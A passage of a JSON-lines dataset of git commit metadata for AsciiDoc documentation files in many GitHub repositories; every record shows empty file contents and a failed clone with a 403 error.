elasticsearch,dataduke\/elasticsearch,yuy168\/elasticsearch,franklanganke\/elasticsearch,franklanganke\/elasticsearch,kunallimaye\/elasticsearch,yongminxia\/elasticsearch,weipinghe\/elasticsearch,JervyShi\/elasticsearch,mbrukman\/elasticsearch,KimTaehee\/elasticsearch,henakamaMSFT\/elasticsearch,tsohil\/elasticsearch,sarwarbhuiyan\/elasticsearch,Rygbee\/elasticsearch,martinstuga\/elasticsearch,javachengwc\/elasticsearch,episerver\/elasticsearch,Asimov4\/elasticsearch,masterweb121\/elasticsearch,infusionsoft\/elasticsearch,ckclark\/elasticsearch,luiseduardohdbackup\/elasticsearch,hanswang\/elasticsearch,njlawton\/elasticsearch,kalburgimanjunath\/elasticsearch,humandb\/elasticsearch,fekaputra\/elasticsearch,linglaiyao1314\/elasticsearch,kunallimaye\/elasticsearch,GlenRSmith\/elasticsearch,PhaedrusTheGreek\/elasticsearch,Widen\/elasticsearch,golubev\/elasticsearch,himanshuag\/elasticsearch,GlenRSmith\/elasticsearch,knight1128\/elasticsearch,i-am-Nathan\/elasticsearch,loconsolutions\/elasticsearch,nellicus\/elasticsearch,rlugojr\/elasticsearch,rento19962\/elasticsearch,kubum\/elasticsearch,AndreKR\/elasticsearch,mnylen\/elasticsearch,wangtuo\/elasticsearch,spiegela\/elasticsearch,Charlesdong\/elasticsearch,markwalkom\/elasticsearch,sauravmondallive\/elasticsearch,onegambler\/elasticsearch,fekaputra\/elasticsearch,mgalushka\/elasticsearch,smflorentino\/elasticsearch,queirozfcom\/elasticsearch,artnowo\/elasticsearch,naveenhooda2000\/elasticsearch,elasticdog\/elasticsearch,iamjakob\/elasticsearch,aglne\/elasticsearch,Siddartha07\/elasticsearch,dylan8902\/elasticsearch,nellicus\/elasticsearch,Widen\/elasticsearch,truemped\/elasticsearch,fooljohnny\/elasticsearch,cnfire\/elasticsearch-1,obourgain\/elasticsearch,wbowling\/elasticsearch,tahaemin\/elasticsearch,IanvsPoplicola\/elasticsearch,kimimj\/elasticsearch,awislowski\/elasticsearch,elancom\/elasticsearch,wimvds\/elasticsearch,schonfeld\/elasticsearch,gingerwizard\/elasticsearch,anti-social\/elasticsearch,polyfractal\/elasticsearch,jpountz\/elasticsearch,nomoa\/elasticsearch,yanjunh\/elasticsearch,socialrank\/elasticsearch,hirdesh2008\/elasticsearch,sauravmondallive\/elasticsearch,iacdingping\/elasticsearch,queirozfcom\/elasticsearch,wangtuo\/elasticsearch,tkssharma\/elasticsearch,mjhennig\/elasticsearch,nomoa\/elasticsearch,kcompher\/elasticsearch,Siddartha07\/elasticsearch,markwalkom\/elasticsearch,slavau\/elasticsearch,khiraiwa\/elasticsearch,Fsero\/elasticsearch,hafkensite\/elasticsearch,markwalkom\/elasticsearch,anti-social\/elasticsearch,obourgain\/elasticsearch,wuranbo\/elasticsearch,acchen97\/elasticsearch,nilabhsagar\/elasticsearch,onegambler\/elasticsearch,dongjoon-hyun\/elasticsearch,polyfractal\/elasticsearch,wangyuxue\/elasticsearch,NBSW\/elasticsearch,pablocastro\/elasticsearch,bawse\/elasticsearch,humandb\/elasticsearch,drewr\/elasticsearch,Clairebi\/ElasticsearchClone,KimTaehee\/elasticsearch,glefloch\/elasticsearch,geidies\/elasticsearch,fernandozhu\/elasticsearch,zeroctu\/elasticsearch,zhiqinghuang\/elasticsearch,infusionsoft\/elasticsearch,uschindler\/elasticsearch,mkis-\/elasticsearch,xuzha\/elasticsearch,MichaelLiZhou\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JSCooke\/elasticsearch,rajanm\/elasticsearch,thecocce\/elasticsearch,TonyChai24\/ESSource,MetSystem\/elasticsearch,robin13\/elasticsearch,tkssharma\/elasticsearch,hanswang\/elasticsearch,chirilo\/elasticsearch,Widen\/elasticsearch,ZTE-PaaS\/elasticsearch,codebunt\/elasticsearch,Shepard1212\/elasticsearch,djschny\/elasticsearch,rhoml\/elasticsearch,Kakakakakku\/elast
icsearch,thecocce\/elasticsearch,tahaemin\/elasticsearch,humandb\/elasticsearch,martinstuga\/elasticsearch,javachengwc\/elasticsearch,jw0201\/elastic,ivansun1010\/elasticsearch,Clairebi\/ElasticsearchClone,uschindler\/elasticsearch,vrkansagara\/elasticsearch,chrismwendt\/elasticsearch,thecocce\/elasticsearch,F0lha\/elasticsearch,mgalushka\/elasticsearch,sauravmondallive\/elasticsearch,jchampion\/elasticsearch,cwurm\/elasticsearch,jprante\/elasticsearch,huypx1292\/elasticsearch,mmaracic\/elasticsearch,zhiqinghuang\/elasticsearch,adrianbk\/elasticsearch,pritishppai\/elasticsearch,sposam\/elasticsearch,lmtwga\/elasticsearch,nellicus\/elasticsearch,thecocce\/elasticsearch,ThalaivaStars\/OrgRepo1,thecocce\/elasticsearch,adrianbk\/elasticsearch,jw0201\/elastic,sarwarbhuiyan\/elasticsearch,strapdata\/elassandra-test,kunallimaye\/elasticsearch,kubum\/elasticsearch,jango2015\/elasticsearch,infusionsoft\/elasticsearch,kingaj\/elasticsearch,HarishAtGitHub\/elasticsearch,ydsakyclguozi\/elasticsearch,aglne\/elasticsearch,koxa29\/elasticsearch,episerver\/elasticsearch,Asimov4\/elasticsearch,dataduke\/elasticsearch,girirajsharma\/elasticsearch,jw0201\/elastic,codebunt\/elasticsearch,mmaracic\/elasticsearch,snikch\/elasticsearch,yuy168\/elasticsearch,franklanganke\/elasticsearch,rlugojr\/elasticsearch,rajanm\/elasticsearch,markharwood\/elasticsearch,pritishppai\/elasticsearch,robin13\/elasticsearch,ydsakyclguozi\/elasticsearch,vingupta3\/elasticsearch,jbertouch\/elasticsearch,MetSystem\/elasticsearch,nomoa\/elasticsearch,lmtwga\/elasticsearch,rmuir\/elasticsearch,rmuir\/elasticsearch,rajanm\/elasticsearch,mjhennig\/elasticsearch,camilojd\/elasticsearch,wittyameta\/elasticsearch,markllama\/elasticsearch,ckclark\/elasticsearch,kkirsche\/elasticsearch,ouyangkongtong\/elasticsearch,chrismwendt\/elasticsearch,Uiho\/elasticsearch,MaineC\/elasticsearch,amaliujia\/elasticsearch,petabytedata\/elasticsearch,KimTaehee\/elasticsearch,sreeramjayan\/elasticsearch,LeoYao\/elasticsearch,YosuaMichael\/elasticsearch,yynil\/elasticsearch,ckclark\/elasticsearch,himanshuag\/elasticsearch,smflorentino\/elasticsearch,masaruh\/elasticsearch,Liziyao\/elasticsearch,markllama\/elasticsearch,mmaracic\/elasticsearch,vroyer\/elasticassandra,pablocastro\/elasticsearch,i-am-Nathan\/elasticsearch,easonC\/elasticsearch,zkidkid\/elasticsearch,kingaj\/elasticsearch,vvcephei\/elasticsearch,heng4fun\/elasticsearch,jimczi\/elasticsearch,Collaborne\/elasticsearch,KimTaehee\/elasticsearch,onegambler\/elasticsearch,szroland\/elasticsearch,sauravmondallive\/elasticsearch,strapdata\/elassandra5-rc,huanzhong\/elasticsearch,gmarz\/elasticsearch,mjhennig\/elasticsearch,masaruh\/elasticsearch,masaruh\/elasticsearch,tsohil\/elasticsearch,scottsom\/elasticsearch,nazarewk\/elasticsearch,geidies\/elasticsearch,vietlq\/elasticsearch,Clairebi\/ElasticsearchClone,zeroctu\/elasticsearch,jaynblue\/elasticsearch,scorpionvicky\/elasticsearch,ulkas\/elasticsearch,winstonewert\/elasticsearch,pablocastro\/elasticsearch,lightslife\/elasticsearch,NBSW\/elasticsearch,EasonYi\/elasticsearch,HarishAtGitHub\/elasticsearch,hydro2k\/elasticsearch,Siddartha07\/elasticsearch,fred84\/elasticsearch,yynil\/elasticsearch,mrorii\/elasticsearch,mortonsykes\/elasticsearch,knight1128\/elasticsearch,zkidkid\/elasticsearch,strapdata\/elassandra-test,overcome\/elasticsearch,Fsero\/elasticsearch,nilabhsagar\/elasticsearch,kevinkluge\/elasticsearch,trangvh\/elasticsearch,sneivandt\/elasticsearch,hafkensite\/elasticsearch,koxa29\/elasticsearch,mcku\/elasticsearch,AndreKR\/elasticsearch,sdau
letau\/elasticsearch,mrorii\/elasticsearch,zeroctu\/elasticsearch,smflorentino\/elasticsearch,tahaemin\/elasticsearch,yongminxia\/elasticsearch,mute\/elasticsearch,bawse\/elasticsearch,pozhidaevak\/elasticsearch,HarishAtGitHub\/elasticsearch,alexshadow007\/elasticsearch,xuzha\/elasticsearch,lchennup\/elasticsearch,caengcjd\/elasticsearch,Liziyao\/elasticsearch,jimhooker2002\/elasticsearch,Kakakakakku\/elasticsearch,alexshadow007\/elasticsearch,feiqitian\/elasticsearch,umeshdangat\/elasticsearch,pritishppai\/elasticsearch,a2lin\/elasticsearch,hirdesh2008\/elasticsearch,SergVro\/elasticsearch,fforbeck\/elasticsearch,mnylen\/elasticsearch,njlawton\/elasticsearch,mm0\/elasticsearch,fforbeck\/elasticsearch,snikch\/elasticsearch,gingerwizard\/elasticsearch","old_file":"docs\/community\/clients.asciidoc","new_file":"docs\/community\/clients.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"89cbca17f950b127278236bf2d7be8bbd8946dbc","subject":"y2b create post This Giant Box Just Showed Up...","message":"y2b create post This Giant Box Just Showed Up...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-02-This-Giant-Box-Just-Showed-Up.adoc","new_file":"_posts\/2017-06-02-This-Giant-Box-Just-Showed-Up.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4029076f97ccc965e9050c7eab3684f69e29b5f1","subject":"Update 2015-03-01-Bienvenue.adoc","message":"Update 2015-03-01-Bienvenue.adoc","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"_posts\/2015-03-01-Bienvenue.adoc","new_file":"_posts\/2015-03-01-Bienvenue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TeksInHelsinki\/TeksInHelsinki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b79ac909b027a01e6b181f03051d8d8e5586c38","subject":"Update 2016-03-28-improve-your-java-environment-with-docker.adoc","message":"Update 2016-03-28-improve-your-java-environment-with-docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-improve-your-java-environment-with-docker.adoc","new_file":"_posts\/2016-03-28-improve-your-java-environment-with-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e1280cf78c008147f4ec3db8e75871ca5504dc0","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","message":"Update 
2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a70ec1b903f5d2fce855008ee6d25df22d6a5bc8","subject":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","message":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a579746bc4b4c31de5bad1c86f633aaa490442d1","subject":"Update 2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","message":"Update 2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","new_file":"_posts\/2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c53dd5ef5054643d8a2486ba2a7308768c5b7ec","subject":"Documentation changes.","message":"Documentation changes.\n","repos":"destijl\/artifacts,pidydx\/artifacts,pidydx\/artifacts,destijl\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pidydx\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fd1d9f69cac1f0b0c3d15f30bed12ace5f8944d2","subject":"Added Camel 2.18.2 release notes to docs","message":"Added Camel 2.18.2 release notes to 
docs\n","repos":"christophd\/camel,pax95\/camel,tadayosi\/camel,sverkera\/camel,jamesnetherton\/camel,tadayosi\/camel,christophd\/camel,zregvart\/camel,DariusX\/camel,pax95\/camel,davidkarlsen\/camel,DariusX\/camel,jamesnetherton\/camel,sverkera\/camel,apache\/camel,alvinkwekel\/camel,onders86\/camel,christophd\/camel,nikhilvibhav\/camel,jamesnetherton\/camel,tadayosi\/camel,nicolaferraro\/camel,anoordover\/camel,nicolaferraro\/camel,cunningt\/camel,davidkarlsen\/camel,objectiser\/camel,onders86\/camel,CodeSmell\/camel,jamesnetherton\/camel,tdiesler\/camel,punkhorn\/camel-upstream,mcollovati\/camel,gnodet\/camel,onders86\/camel,objectiser\/camel,zregvart\/camel,nicolaferraro\/camel,DariusX\/camel,sverkera\/camel,pax95\/camel,adessaigne\/camel,ullgren\/camel,adessaigne\/camel,nikhilvibhav\/camel,cunningt\/camel,jamesnetherton\/camel,davidkarlsen\/camel,kevinearls\/camel,alvinkwekel\/camel,davidkarlsen\/camel,jamesnetherton\/camel,gnodet\/camel,kevinearls\/camel,ullgren\/camel,Fabryprog\/camel,nikhilvibhav\/camel,onders86\/camel,pmoerenhout\/camel,pmoerenhout\/camel,onders86\/camel,alvinkwekel\/camel,anoordover\/camel,Fabryprog\/camel,kevinearls\/camel,christophd\/camel,cunningt\/camel,kevinearls\/camel,christophd\/camel,zregvart\/camel,mcollovati\/camel,onders86\/camel,pax95\/camel,CodeSmell\/camel,punkhorn\/camel-upstream,tdiesler\/camel,gnodet\/camel,pax95\/camel,pmoerenhout\/camel,sverkera\/camel,cunningt\/camel,cunningt\/camel,apache\/camel,anoordover\/camel,objectiser\/camel,sverkera\/camel,objectiser\/camel,sverkera\/camel,nicolaferraro\/camel,adessaigne\/camel,Fabryprog\/camel,apache\/camel,tadayosi\/camel,apache\/camel,pax95\/camel,anoordover\/camel,tdiesler\/camel,tadayosi\/camel,punkhorn\/camel-upstream,adessaigne\/camel,gnodet\/camel,adessaigne\/camel,gnodet\/camel,kevinearls\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,christophd\/camel,adessaigne\/camel,tadayosi\/camel,anoordover\/camel,apache\/camel,kevinearls\/camel,zregvart\/camel,tdiesler\/camel,CodeSmell\/camel,CodeSmell\/camel,apache\/camel,anoordover\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,DariusX\/camel,ullgren\/camel,pmoerenhout\/camel,cunningt\/camel,tdiesler\/camel,mcollovati\/camel,pmoerenhout\/camel,mcollovati\/camel,Fabryprog\/camel,tdiesler\/camel,ullgren\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2182-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2182-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b7e80c9006515ad34754ee828aeae71c7bcc0bd7","subject":"Create ArchitectureDocumentation.asciidoc","message":"Create ArchitectureDocumentation.asciidoc\n","repos":"RainerWinkler\/Moose-Diagram","old_file":"Documentation\/ArchitectureDocumentation.asciidoc","new_file":"Documentation\/ArchitectureDocumentation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RainerWinkler\/Moose-Diagram.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"490099cd6960233c50ea846e3cc40aa338d4b0f0","subject":"update doc","message":"update doc\n","repos":"sirjorj\/libxwing","old_file":"API.adoc","new_file":"API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sirjorj\/libxwing.git\/': The requested URL returned error: 
403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"86d8fe0e29490b0ae8166c7293cd40ae9b6bc3f9","subject":"Update 2016-01-28-CDI-Vette-truukjes-met-Instance.adoc","message":"Update 2016-01-28-CDI-Vette-truukjes-met-Instance.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-01-28-CDI-Vette-truukjes-met-Instance.adoc","new_file":"_posts\/2016-01-28-CDI-Vette-truukjes-met-Instance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72e65f06500ca8a784bc7b0a60641ca443a94b86","subject":"OGM-659 Adding note on experimental features to reference guide","message":"OGM-659 Adding note on experimental features to reference guide\n","repos":"tempbottle\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,mp911de\/hibernate-ogm,mp911de\/hibernate-ogm,ZJaffee\/hibernate-ogm,gunnarmorling\/hibernate-ogm,uugaa\/hibernate-ogm,mp911de\/hibernate-ogm,DavideD\/hibernate-ogm,jhalliday\/hibernate-ogm,jhalliday\/hibernate-ogm,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,uugaa\/hibernate-ogm,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,schernolyas\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,uugaa\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm,tempbottle\/hibernate-ogm,schernolyas\/hibernate-ogm,gunnarmorling\/hibernate-ogm,hibernate\/hibernate-ogm,tempbottle\/hibernate-ogm,ZJaffee\/hibernate-ogm,gunnarmorling\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,jhalliday\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm,ZJaffee\/hibernate-ogm,hferentschik\/hibernate-ogm,DavideD\/hibernate-ogm-contrib","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/preface.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/preface.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"e60af34bd259861a47715186b63f6c1cfd8dac3f","subject":"Basic documentation for enironment variables, fixes #58","message":"Basic documentation for enironment variables, fixes #58\n","repos":"goldmann\/docker-scripts,goldmann\/docker-squash","old_file":"docs\/environment_variables.adoc","new_file":"docs\/environment_variables.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/goldmann\/docker-squash.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb8af8e07417768f5955996fd890e6b8c0956377","subject":"Create migration_guide.adoc","message":"Create migration_guide.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/migration_guide.adoc","new_file":"userguide\/tutorials\/migration_guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"b507b003c836b329aa434c6d8f7941fc7f7a7d19","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9989801df900b5bac3070bef4684aa86096eaf44","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8cd375c37a43d4664b111a2b120b0f0aa4c791a","subject":"Update 2015-01-31-Das-war-der-5-Linux-Informationstag.adoc","message":"Update 2015-01-31-Das-war-der-5-Linux-Informationstag.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2015-01-31-Das-war-der-5-Linux-Informationstag.adoc","new_file":"_posts\/2015-01-31-Das-war-der-5-Linux-Informationstag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c081fcbc14a911fce91ba350d6a2206ae01ee6b8","subject":"Update 2020-05-17-How-To-Use-Rsync-to-Sync-with-a-Remote-System.adoc","message":"Update 2020-05-17-How-To-Use-Rsync-to-Sync-with-a-Remote-System.adoc","repos":"YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io","old_file":"_posts\/2020-05-17-How-To-Use-Rsync-to-Sync-with-a-Remote-System.adoc","new_file":"_posts\/2020-05-17-How-To-Use-Rsync-to-Sync-with-a-Remote-System.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannDanthu\/YannDanthu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57dc39865bbf75c64f063dc9de6401890e8d70c7","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"84223d00f92d7aed2136a5e51d1ecc1a7ee7dff4","subject":"Update 2015-12-14-treat-your-pom-the-same-as-your-java-code.adoc","message":"Update 2015-12-14-treat-your-pom-the-same-as-your-java-code.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-12-14-treat-your-pom-the-same-as-your-java-code.adoc","new_file":"_posts\/2015-12-14-treat-your-pom-the-same-as-your-java-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a26b7f4c32dbb7c7ef7c190ee5fdf27e4caee3a0","subject":"y2b create post DRONE Controller Unboxing \\u0026 Demo","message":"y2b create post DRONE Controller Unboxing \\u0026 Demo","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-03-18-DRONE-Controller-Unboxing-u0026-Demo.adoc","new_file":"_posts\/2014-03-18-DRONE-Controller-Unboxing-u0026-Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd935a7b26c4dbcc6956a9269ff944ed15aa56fa","subject":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","message":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5adfed2c37445b5620c55a0394ff2d9cae8d2441","subject":"Adds the Public Type System & Type Annotation CIP","message":"Adds the Public Type System & Type Annotation CIP\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP2015-09-16-public-type-system-type-annotation.adoc","new_file":"cip\/CIP2015-09-16-public-type-system-type-annotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"36133d93fe3de840b6a3ec999e26880ff7be3654","subject":"Fix incorrect header depth in the documentation","message":"Fix incorrect header depth in the 
documentation\n","repos":"NetoDevel\/spring-boot,ilayaperumalg\/spring-boot,qerub\/spring-boot,joansmith\/spring-boot,izeye\/spring-boot,i007422\/jenkins2-course-spring-boot,rajendra-chola\/jenkins2-course-spring-boot,lburgazzoli\/spring-boot,nebhale\/spring-boot,ollie314\/spring-boot,donhuvy\/spring-boot,neo4j-contrib\/spring-boot,jayarampradhan\/spring-boot,mbenson\/spring-boot,drumonii\/spring-boot,xiaoleiPENG\/my-project,ilayaperumalg\/spring-boot,philwebb\/spring-boot,kamilszymanski\/spring-boot,spring-projects\/spring-boot,izeye\/spring-boot,herau\/spring-boot,sebastiankirsch\/spring-boot,linead\/spring-boot,ihoneymon\/spring-boot,hello2009chen\/spring-boot,shakuzen\/spring-boot,RichardCSantana\/spring-boot,shakuzen\/spring-boot,habuma\/spring-boot,dreis2211\/spring-boot,javyzheng\/spring-boot,NetoDevel\/spring-boot,lenicliu\/spring-boot,NetoDevel\/spring-boot,herau\/spring-boot,zhanhb\/spring-boot,scottfrederick\/spring-boot,eddumelendez\/spring-boot,spring-projects\/spring-boot,deki\/spring-boot,herau\/spring-boot,spring-projects\/spring-boot,jayarampradhan\/spring-boot,NetoDevel\/spring-boot,ptahchiev\/spring-boot,bclozel\/spring-boot,htynkn\/spring-boot,tiarebalbi\/spring-boot,sebastiankirsch\/spring-boot,isopov\/spring-boot,brettwooldridge\/spring-boot,isopov\/spring-boot,mbogoevici\/spring-boot,linead\/spring-boot,ollie314\/spring-boot,kamilszymanski\/spring-boot,bclozel\/spring-boot,bjornlindstrom\/spring-boot,izeye\/spring-boot,chrylis\/spring-boot,mbogoevici\/spring-boot,zhanhb\/spring-boot,ihoneymon\/spring-boot,felipeg48\/spring-boot,joshiste\/spring-boot,eddumelendez\/spring-boot,ilayaperumalg\/spring-boot,dreis2211\/s